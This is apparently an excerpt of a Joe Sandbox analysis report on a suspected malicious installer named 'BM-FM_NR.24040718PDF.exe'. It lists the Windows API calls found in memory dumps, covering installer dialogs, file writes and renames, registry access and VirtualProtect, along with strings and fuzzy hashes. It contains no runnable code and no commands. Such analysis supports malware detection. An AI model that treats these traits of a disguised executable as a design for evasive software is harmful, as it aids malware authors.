                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                        • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: PathSearch
                                                                      • String ID:
                                                                      • API String ID: 2203818243-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 00403F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                      • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                      • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                      • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                      • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                      • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                      • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                      • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                      • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                      • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                      • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                                      • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                      • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CharNextA.USER32(?,004031FA,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000020), ref: 004057D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID:
                                                                      • API String ID: 3213498283-0
                                                                      • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                      • Instruction ID: dc214379263094bd3ac6d45bee5908574ed7c4f63653bd68f3b20c8c8f565c76
                                                                      • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                      • Instruction Fuzzy Hash: 0AC08C3440C784EBC6214720902886BBFF0AA52300F3884ABF0C263251E238AC10AB3B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                      • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                      • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                      • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                      • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                      • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                      • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                      • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                      • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                      • lstrcmpiA.KERNEL32(Call,Dominique Setup: Installing), ref: 004044B9
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 004044C5
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                        • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                        • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                      • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                        • Part of subcall function 00404709: lstrlenA.KERNEL32(Dominique Setup: Installing,Dominique Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                        • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                        • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Dominique Setup: Installing), ref: 004047C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$Call$Dominique Setup: Installing
                                                                      • API String ID: 2624150263-335891194
                                                                      • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                      • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                      • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                      • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold, xrefs: 0040211D
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold
                                                                      • API String ID: 123533781-3007469680
                                                                      • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                      • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                      • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                      • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                      • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                      • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                      • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                      • GetSysColor.USER32(?), ref: 0040412B
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                      • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                      • SendMessageA.USER32(00000000), ref: 004041D5
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                      • SetCursor.USER32(00000000), ref: 00404258
                                                                      • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                      • SetCursor.USER32(00000000), ref: 0040427B
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: (@@$Call$N$open
                                                                      • API String ID: 3615053054-2228552488
                                                                      • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                      • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                      • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                      • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Dominique Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: Dominique Setup$F
                                                                      • API String ID: 941294808-1828777385
                                                                      • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                      • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                      • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                      • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                      • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                        • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                        • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                      • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                      • wsprintfA.USER32 ref: 00405AEF
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                      • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                        • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
                                                                        • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                      • API String ID: 222337774-4148678300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                      • CharPrevA.USER32(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 00405FE2
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 00405FD6
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-1445150382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                      • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                      • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                      • GetSysColor.USER32(?), ref: 00403FDF
                                                                      • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                      • DeleteObject.GDI32(?), ref: 00404009
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
